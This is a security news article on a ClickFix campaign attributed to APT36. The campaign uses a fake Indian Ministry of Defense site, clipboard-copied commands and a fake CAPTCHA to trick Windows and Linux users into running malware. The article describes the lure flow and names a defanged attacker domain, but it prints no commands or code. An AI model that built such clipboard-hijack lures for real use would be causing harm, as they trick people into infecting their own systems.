A new malicious campaign has highlighted how ClickFix attacks are rapidly evolving and expanding their reach. Originally targeting Windows systems through PowerShell scripts that enabled spyware and ransomware infections, this technique has now begun to also target Linux and macOS users. In these attacks, cybercriminals use fake error messages (such as alleged Google Meet failures) or simulated verification screens to trick victims into executing commands in the terminal.
ClickFix does not rely on technical system vulnerabilities, but rather on something much more human: trust. Through social engineering tactics, attackers manipulate users into running scripts that appear legitimate but conceal malware designed to compromise the system. Even environments considered more secure, like Linux, are not exempt.
Recently, researchers at Hunt.io detected a new campaign that marks an interesting shift: for the first time, ClickFix attacks are being adapted for Linux systems. This campaign, attributed to the threat group APT36 (also known as Transparent Tribe and linked to Pakistan), uses a fake website impersonating the Indian Ministry of Defense. The site includes a link to what appears to be an official press release but is in fact a trap designed to deceive users into executing malicious commands on their machines.
Malicious Website Imitating the Indian Ministry of Defense
When someone clicks the link to the fake site, it automatically analyzes which operating system is being used and guides them down the attack path best suited to that system.
If you're on Windows, a full-screen page appears with a warning about limited usage rights—nothing too suspicious at first glance. But if you click "Continue," a JavaScript is triggered that automatically copies a malicious command to the clipboard. The unsuspecting victim only needs to paste it into the terminal and run it. With that, a .NET loader is launched, which connects directly to the attacker's servers. All of this happens while an official-looking PDF file is displayed to avoid raising suspicion.
On Linux, the tactic is slightly different but just as deceptive. The user is redirected to a page with a fake CAPTCHA. When clicking the “I’m not a robot” button, a shell command is copied to the clipboard. Then, the site instructs the user to press ALT+F2, which opens a quick launch dialog in Linux. There, they are asked to paste the command and press Enter. And just like that, the malware is in.
Read more: New Disk-Wiping Malware Targets Linux via Go Modules on GitHub
The command executed on Linux downloads a file named mapeal.sh onto the victim’s device. However, according to researchers, the current version of this script does not perform any malicious actions yet. For now, it simply downloads a JPEG image from the attacker's server.
“The script downloads a JPEG image from the same directory on trade4wealth[.]in and opens it in the background,” Hunt.io explains. “We did not observe any other activity—no persistence, no lateral movement, no outbound connections.”
This doesn’t mean everything is under control. It’s highly likely that APT36 is testing how effective its attack chain is on Linux, and that this is just a trial version. At any moment, that image could be replaced with an actual script designed to install malware, spy on the user, or cause more serious damage.
What’s concerning is that this ClickFix variant has already been adapted for Windows, macOS, and now Linux—demonstrating how versatile and dangerous it can be.
As a general rule, never copy and paste commands into the Run dialog (or the terminal) unless you are absolutely sure what they do. That simple action could be enough to compromise your system and expose your personal or professional data.